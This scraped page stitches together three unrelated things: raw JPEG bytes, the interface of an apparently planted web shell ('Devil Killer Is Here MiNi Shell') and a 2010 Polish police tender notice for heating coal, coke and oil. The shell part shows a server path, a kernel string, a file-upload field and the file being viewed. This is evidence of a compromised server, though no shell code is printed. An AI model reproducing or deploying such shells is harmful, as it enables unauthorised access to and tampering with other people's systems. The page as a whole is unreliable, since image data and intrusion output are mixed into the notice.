JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100916/294638-N-2010.html

<p class="kh_header"><b>Gorzów Wielkopolski: Zakup i dostawa opału dla  jednostek Policji województwa lubuskiego na sezony grzewcze 2010/2011 i 2011/2012.</b><br>
<b>Numer ogłoszenia: 294638 - 2010; data zamieszczenia: 16.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Kwiatowa 10, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 95 738 14 41, faks 95 738 14 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubuska.policja.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie Dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Policja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa opału dla  jednostek Policji województwa lubuskiego na sezony grzewcze 2010/2011 i 2011/2012..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Zakup i dostawa opału dla  jednostek Policji województwa lubuskiego na sezony grzewcze 2010/2011 i 2011/2012.    
2.Wykaz jednostek Policji ilości i rodzajów poszczególnych materiałów opałowych, zawiera załącznik nr. 1 do SIWZ.
3.Dostarczany opał musi odpowiadać następującym parametrom jakościowym:
a)Koks wg PN-86/C-02050.06: 
-wartość opałowa ponad -  27.000  kJ/kg, 
-maksymalna zawartość siarki - 0,65 %; 
-maksymalna zawartość popiołu - 10,5 %;
-dopuszczalna wilgotność -  8 %;
-części lotne - 1 %
b)węgiel kamienny wg PN-82/G-97003: 
-wartość opałowa ponad 29.000 kJ/kg, 
-maksymalna zawartość siarki - 0,7 %
-maksymalna zawartość popiołu - 10 %;
c)olej opałowy wg PN-71/C-97012: 
-o wartości opałowej min. 42,6 MJ/kg, 
-maksymalna zawartość siarki - 0,2 %, 
-maksymalna zawartość wody - 100 mg/kg.
4.Planowa łączna ilość opału (dla wszystkich jednostek) wynosi:
a)Węgiel kamienny - 138,100 t
b)Koks - 35,900 t
c)Olej opałowy - 76,000 l
5.Zamawiający zastrzega sobie możliwość zmniejszenia (zwiększenia) zakresu zamówienia w przypadku, gdy  nastąpi wyłączenie (bądź włączenie) danej posesji spod (do) zarządu Zamawiającego w granicach określonych w pkt. III ppkt. 7 SIWZ.
6.Zamawiający dopuszcza możliwość zmiany ilości kupowanego opału (w granicach 20%),   w zależności od potrzeb wynikających z warunków atmosferycznych,       lub zwiększenia/zmniejszenia zużycia z przyczyn technicznych.
7.Przedmiot zamówienia podzielono na 10 części - (podział terytorialny), w zależności od rodzaju opału i miejsca realizacji przedmiotu zamówienia. - szczegółowy opis części zawiera pkt. IV SIWZ.
8.Realizacja dostaw przebiegać będzie etapowo stosownie do potrzeb Zamawiającego. Wielkość każdej dostawy zależeć będzie  od jednostronnych dyspozycji Zamawiającego zgłaszanych telefonicznie, na piśmie, faksem lub drogą elektroniczną. 
9.Wykonawca zobowiązuje się do dostarczania cząstkowych zamówień własnym transportem na swój koszt i ryzyko w ciągu 2 dni roboczych (od poniedziałku do piątku) od zgłoszenia przez pracownika odpowiedniej jednostki Policji woj. lubuskiego, w ilościach określonych w zgłoszeniu, bezpośrednio pod wskazany adres.
10.Za termin dokonania dostawy  uważany będzie  dzień dostarczenia  przedmiotu zamówienia do miejsca wskazanego przez pracownika Zamawiającego w zgłoszeniu  i jego przyjęcia przez upoważnionego pracownika odpowiedniej jednostki Policji woj. lubuskiego.
11.Odbioru dostawy opału dokona upoważniony pracownik danej jednostki  Policji woj. lubuskiego do której dostawa była przeznaczona. Odbiór musi być potwierdzony pisemnie, odpowiednim dokumentem odbioru (protokół odbioru).
12.Realizacja umowy będzie przebiegała etapowo, w miarę potrzeb ze strony Zamawiającego.
13.Zamawiający wymaga gwarancji jakości na okres obowiązywania umowy.
14.Termin płatności - 30 dni od dnia dostarczenia faktury VAT Zamawiającemu.
15.OPIS CZĘŚCI ZAMÓWIENIA 
1) Zamawiający dopuszcza możliwość składania ofert częściowych, w zależności od rodzaju opału i miejsca realizacji przedmiotu zamówienia 
2) Przedmiot zamówienia podzielono na 10 części:
CZĘŚĆ I 	KWP GORZÓW WLKP.  -  WĘGIEL				
CZĘŚĆ II KMP ZIELONA GÓRA    -  WĘGIEL
CZĘŚĆ III KPP MIĘDZYRZECZ    -   WĘGIEL	
CZĘŚĆ IV  KPP NOWA SÓL 	    -   KOKS
CZĘŚĆ V 	KPP SŁUBICE 	    -  WĘGIEL			
CZĘŚĆ VI	 KPP SULĘCIN	    -  OLEJ OPAŁOWY
CZĘŚĆ VI	I KPP ŚWIEBODZIN     -  WĘGIEL I KOKS	
CZĘŚĆ VIII KPP WSZCHOWA	    -  OLEJ OPAŁOWY	
CZĘŚĆ IX	KPP ŻARY	    -  WĘGIEL	
CZĘŚĆ X	KPP ŻARY	    -  OLEJ OPAŁOWY.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.11.30.00-4, 09.11.12.10-5, 09.13.51.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie Dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, jeżeli Wykonawca:
- wykaże, że posiada aktualną koncesję na obrót paliwami ciekłymi w częściach obejmujących dostawę oleju opałowego na czas obowiązywania umowy. 
Zgodnie z art. 32 ust 1 pkt 4) Ustawy  Prawo Energetyczne z dnia 10 kwietnia 1997  (tekst jednolity), Wykonawca prowadzący działalność gospodarczą w zakresie obrotu paliwami lub energią musi posiadać aktualną podczas obowiązywania umowy koncesję na obrót paliwami ciekłymi wydaną przez Prezesa Urzędu Regulacji Energetyki.
 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) powyższy warunek musi być spełniony przez każdego z członków Konsorcjum osobno - Dotyczy oleju opałowego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Na potwierdzenie spełniana przez oferowane dostawy wymagań określonych przez Zamawiającego w  SIWZ Zamawiający żąda, aby Wykonawca załączył do oferty:
a) Certyfikat jakości w częściach obejmujących dostawę koksu i węgla wystawiony przez podmiot do tego uprawniony.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Ponadto Wykonawca musi załączyć do oferty:
a)prawidłowo wypełniony i podpisany Formularz Ofertowy (wzór - załącznik nr 2 do SIWZ);
b)w przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć upoważnienie lub pełnomocnictwo (w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza - wyrok SO w warszawie - SYGN.AKT V CA 85/07), określające zakres czynności, do których jest umocowany. 
c)oświadczenie o podwykonawcach, jeżeli Wykonawca przewiduje ich udział w realizacji zadania (wzór - załącznik nr 4 do SIWZ);
d)Zamawiający zaleca załączyć do oferty podpisany lub zaparafowany przez Wykonawcę lub osobę uprawnioną do reprezentowania Wykonawcy - Projekt Umowy - zał. nr 5 do SIWZ (zaleca się wypełnienie Projektu Umowy w części dotyczącej Wykonawcy i jego oferty) - nie jest wymagane załączanie Projektu umowy do oferty. W sytuacji braku w ofercie Projektu Umowy Zamawiający uzna,  że Wykonawca zapoznał się z jego treścią i akceptuje zawarte w nim warunki (na podstawie oświadczenia zawartego w pkt 7 Formularza ofertowego).
e)W przypadku złożenia oferty przez Spółkę Cywilną należy załączyć oświadczenie o woli współpracy Wykonawców wspólnie składających ofertę. 
f)oświadczenie o woli współpracy Wykonawców wspólnie składających ofertę, ustanawiające Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego (wyznaczenie Lidera). W przypadku Wykonawców występujących wspólnie zastosowanie maja przepisy ustawy zawarte w art. 23 ust. 1-4 ustawy P.z.p. 
Uwaga: W przypadku Wykonawców występujących wspólnie zastosowanie mają przepisy ustawy zawarte w art. 23 ust. 1 - 4 ustawy P.z.p.
2.Wszystkie wymagane dokumenty muszą być dostarczone w formie oryginałów lub kserokopii poświadczonej za	 zgodność z oryginałem (podpisem lub parafką) przez Wykonawcę lub osobę przez niego upoważnioną - z wyjątkiem  pkt XIII ppkt 5 lit. b) SIWZ.
3.Jeżeli złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości Zamawiający może żądać przedstawienia oryginału lub kopii notarialnie poświadczonej.
4.Dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę jego podpisem.
5.W przypadku, kiedy ofertę składają Wykonawcy występujący wspólnie, oferta oraz wszystkie dokumenty wymienione w pkt. XIII ppkt. 5 muszą być podpisane przez upoważnionego przedstawiciela.
6.Brak  wymaganych w pkt. XIII ppkt. 1-3  SIWZ dokumentów lub złożenie ich niewłaściwej formie spowoduje wykluczenie Wykonawcy z postępowania o udzielenie zamówienia (zgodnie z art. 24 ust. 2 pkt. 3 ustawy P.z.p., po wyczerpaniu możliwości uzupełnienia dok. lub wyjaśnienia treści dok. na podst. art. 26 ust. 3 i 4 oraz 	art. 87 ust. 2 ustawy P.z.p.).
7. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą zgodnie z art. 24 ust. 4 ustawy P.z.p.
8. Brak wymaganych w pkt. XIII  ppkt. 4  oraz ppkt. 5 lit. b) SIWZ dokumentów lub złożenie ich w niewłaściwej 	formie spowoduje odrzucenie oferty Wykonawcy     (zgodnie z art. 89 	ust.1 pkt. 2 ustawy  P.z.p., po wyczerpaniu możliwości uzupełnienia dok. lub wyjaśnienia treści dok. na 	podst. art. 26 ust. 3 i 4 ustawy P.z.p.).
9. Brak wymaganych w pkt XIII ppkt 5 lit. a); c); e); f);  SIWZ dokumentów lub złożenie ich w niewłaściwej formie spowoduje odrzucenie oferty Wykonawcy (zgodnie z - po wyczerpaniu  przez Zamawiającego możliwości wynikających z art. 87 ust. 1 i 2 ustawy P.z.p.). art. 89 ust. 1 pkt 2 ustawy P.z.p.
10. Wszystkie miejsca, w których Wykonawca naniósł zmiany muszą być parafowane przez 	osobę podpisującą ofertę.
11.Jeżeli oferta Wykonawców występujących wspólnie (konsorcjum-Spółka Cywilna)zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców, a w przypadku Przedsiębiorców prowadzących działalność w formie Spółki Cywilnej  umowę Spółki.
12.Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę informacji (dokumentów, załączników, 	oświadczeń itp.) mających wpływ na wynik prowadzonego postępowania powoduje wykluczenie Wykonawcy z przetargu na każdym jego etapie, zgodnie z dyspozycją art.24 ust.2 pkt.2 Ustawy P.z.p. Osoba lub osoby składające ofertę ponoszą pełną odpowiedzialność za treść złożonego oświadczenia woli na zasadach określonych w art. 297 §1 Kodeksu Karnego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość wprowadzenia istotnych zmian do zawartej umowy zgodnie z art. 144 ust. 1 ustawy P.z.p., w stosunku do treści oferty (poprawienie omyłki pisarskiej, omyłki rachunkowej). Wszelkie zmiany wymagają zgody obu stron i formy pisemnej w postaci aneksu pod rygorem nieważności.
Warunki zmiany:
-błędy pisarskie w treści umowy;
-zmiana podwykonawcy oraz zakresu realizacji zamówienia przez podwykonawcę;
-zmiana wynagrodzenia brutto w przypadku urzędowej zmiany stawki podatku VAT,
-zmiana miejsca dostawy jeśli dostawa w miejscu wskazanym jest utrudniona  lub nie możliwa,
-zmiana terminu dostawy jeśli dostawa w wyznaczonym terminie jest utrudniona  lub nie możliwa.
-zmiana okresu obowiązywania umowy wobec niewykorzystania kwoty przeznaczonej na zamówienie,
-zmiany związane z zaistnieniem siły wyższej, klęski żywiołowej innych przyczyn niezależnych  od stron umowy powodujące konieczność zmiany terminu realizacji umowy, dostaw, miejsc dostawy.
2.Jeżeli występują zmiany w strukturze organizacyjnej Zamawiającego lub Wykonawcy, dotyczące określonych  w umowie nazw, adresów, podległości, rachunków bankowych oraz wykazu osób i numerów telefonów  kontaktowych Strony niezwłocznie informują pisemnie o tych zmianach. Zmiany takie nie wymagają formy pisemnej w postaci aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubuska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji ul. Kwiatowa 10 66-400 Gorzów Wlkp. Sekcja ds. Zamówień Publicznych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2010 godzina 11:00, miejsce: Komenda Wojewódzka Policji ul. Kwiatowa 10 66-400 Gorzów Wlkp. Sekcja ds.
Zamówień Publicznych..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.TERMIN WYKONANIA ZAMÓWIENIA - Zamawiający wymaga wykonania zamówienia w terminie: sezon grzewczy 2010/2011 i 2011/2012 tj. od dnia zawarcia umowy do dnia 30.04.2012r. - (dotyczy wszystkich części).
2. OFERTY WARIANTOWE - Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
3. UMOWY RAMOWE - Zamawiający nie zamierza zawrzeć umowy ramowej. 
4. SPOSÓB PRZEKAZYWANIA INFORMACJI
1) Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują sobie pisemnie, faksem lub drogą elektroniczną (art. 27 ust. 1 ustawy P.z.p.)
2) Zamawiający żąda od Wykonawcy potwierdzenia faktu otrzymania oświadczenia, wniosku, zawiadomienia lub informacji wysyłanych drogą elektroniczną lub faksem (art. 27 ust. 2 ustawy P.z.p.). 
3) Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SIWZ zgodnie z art. 38 ustawy P.z.p. 
4) W przypadku rozbieżności pomiędzy treścią niniejszej SIWZ a treścią udzielonych odpowiedzi, jako obowiązującą należy przyjąć treść pisma Zamawiającego z późniejszą datą.
5. POROZUMIEWANIE SIĘ Z WYKONAWCAMI 
1) Postępowanie o udzielenie zamówienia z zastrzeżeniem wyjątków określonych w ustawie prowadzi się w formie pisemnej (art. 9 ust. 1 ustawy P.z.p.) w języku polskim (art. 9 ust. 2 ustawy P.z.p.).
2) Wszelkie zapytania dotyczące postępowania o udzielenie zamówienia należy kierować w godzinach urzędowania Zamawiającego tj: od godziny 7:30 do 15:30 w dni robocze, na adres Zamawiającego- ul. Kwiatowa 10, 66-400 Gorzów Wlkp., Sekcja ds. Zamówień Publicznych e-mail: kwp_gorzow.zamowienia@lubuska.policja.gov.pl lub  fax 095/721 14 35. 
W przypadku dostarczenia dokumentu po godzinach urzędowania - Zamawiający uzna, że  zapoznał się z jego treścią w następnym dniu roboczym.
6. Nie dotyczy finansowania projektu ze środków Unii Europejskiej.
7. Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów.
8. Zamawiający dokona otwarcia ofert w dniu 24.09.2010r. o godz. 11:15 w swojej siedzibie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KWP GORZÓW WLKP.  -  WĘGIEL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Zakup i dostawa opału dla  jednostek Policji województwa lubuskiego na sezony grzewcze 2010/2011 i 2011/2012.  
2.Wykaz jednostek Policji ilości i rodzajów poszczególnych materiałów opałowych, zawiera załącznik nr. 1 do SIWZ.
3. Dostarczany opał musi odpowiadać następującym parametrom jakościowym:
a) Koks wg PN-86/C-02050.06: 
-wartość opałowa ponad -  27.000  kJ/kg, 
-maksymalna zawartość siarki - 0,65 %; 
-maksymalna zawartość popiołu - 10,5 %;
-dopuszczalna wilgotność -  8 %;
-części lotne - 1 %
b)węgiel kamienny wg PN-82/G-97003: 
-wartość opałowa ponad 29.000 kJ/kg, 
-maksymalna zawartość siarki - 0,7 %
-maksymalna zawartość popiołu - 10 %;
c)olej opałowy wg PN-71/C-97012: 
-o wartości opałowej min. 42,6 MJ/kg, 
-maksymalna zawartość siarki - 0,2 %, 
-maksymalna zawartość wody - 100 mg/kg.
4. Planowa łączna ilość opału (dla wszystkich jednostek) wynosi:
a)Węgiel kamienny - 138,100 t
b)Koks - 35,900 t
c)Olej opałowy - 76,000 l
5. Zamawiający zastrzega sobie możliwość zmniejszenia (zwiększenia) zakresu zamówienia w przypadku, gdy  nastąpi wyłączenie (bądź włączenie) danej posesji spod (do) zarządu Zamawiającego w granicach określonych w pkt. III ppkt. 7 SIWZ.
6. Zamawiający dopuszcza możliwość zmiany ilości kupowanego opału (w granicach 20%), w zależności od potrzeb wynikających z warunków atmosferycznych, lub zwiększenia/zmniejszenia zużycia z przyczyn technicznych.
7. Przedmiot zamówienia podzielono na 10 części - (podział terytorialny), w zależności od rodzaju opału i miejsca realizacji przedmiotu zamówienia. - szczegółowy opis części zawiera pkt. IV SIWZ
8. Realizacja dostaw przebiegać będzie etapowo stosownie do potrzeb Zamawiającego. Wielkość każdej dostawy zależeć będzie  od jednostronnych dyspozycji Zamawiającego zgłaszanych telefonicznie, na piśmie, faksem lub drogą elektroniczną. 
9. Wykonawca zobowiązuje się do dostarczania cząstkowych zamówień własnym transportem na swój koszt i ryzyko w ciągu 2 dni roboczych (od poniedziałku do piątku) od zgłoszenia przez pracownika odpowiedniej jednostki Policji woj. lubuskiego, w ilościach określonych w zgłoszeniu, bezpośrednio pod wskazany adres.
